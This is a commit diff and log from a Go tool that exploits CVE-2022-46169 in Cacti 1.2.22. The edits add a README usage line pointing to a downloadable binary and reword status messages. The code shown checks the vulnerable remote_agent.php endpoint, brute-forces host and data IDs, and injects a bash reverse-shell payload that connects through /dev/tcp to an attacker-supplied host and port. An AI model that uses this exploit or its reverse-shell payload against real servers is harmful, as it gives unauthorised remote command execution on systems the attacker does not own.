updated readme

tidy
exit after exploit finishes
2025-01-25 02:13:26 +08:00 · 2025-01-24 11:42:39 +08:00 · 2025-01-24 11:40:04 +08:00 · 2025-01-24 11:33:53 +08:00
2 changed files with 9 additions and 4 deletions
--- a/README.md
+++ b/README.md
@ -1,5 +1,9 @@
 # CVE-2022-46169

+# Usage
+
+Download the binary from the [latest release](https://git.vomitblood.com/Vomitblood/cve-2022-46169/releases).
+
 For Cacti 1.2.22.  
 Written in Go.  
 Credits to [ruycr4ft](https://github.com/ruycr4ft/CVE-2022-46169).
--- a/internal/exploiter/exploiter.go
+++ b/internal/exploiter/exploiter.go
@ -106,14 +106,15 @@ func reverseShell(payload string, vulnUrl string, hostID int, dataIDs int) {
 		fmt.Println("Error making request:", err)
 		return
 	}
-	defer resp.Body.Close()
+
+	resp.Body.Close()
 }

 func Exploit(urlTarget string, lhost string, lport string) {
 	vulnURL := urlTarget + "/remote_agent.php"
-	fmt.Println("Checking...")
+	fmt.Println("Checking for vulnerability...")
 	if checkVuln(vulnURL) {
-		fmt.Println("The target is vulnerable. Exploiting...")
+		fmt.Println("The target is vulnerable. Bruteforcing...")

 		fmt.Println("Bruteforcing the host_id and local_data_ids")
 		isVuln, hostID, dataIDs := bruteForcing(vulnURL)
@ -122,7 +123,7 @@ func Exploit(urlTarget string, lhost string, lport string) {
 			payload := fmt.Sprintf("bash -c 'bash -i >& /dev/tcp/%s/%s 0>&1'", lhost, lport)
 			reverseShell(payload, vulnURL, hostID, dataIDs)
 		} else {
-			fmt.Println("The Bruteforce Failed...")
+			fmt.Println("The bruteforce failed...")
 		}
 	} else {
 		fmt.Println("The target is not vulnerable")
Author	SHA1	Message	Date
Vomitblood	788124d44f	updated readme	2025-01-25 02:13:26 +08:00
Vomitblood	cf0d3444e8	tidy	2025-01-24 11:42:39 +08:00
Vomitblood	d9c3670e96	exit after exploit finishes	2025-01-24 11:40:04 +08:00
Vomitblood	d24b8acd21	fixed text outputs	2025-01-24 11:33:53 +08:00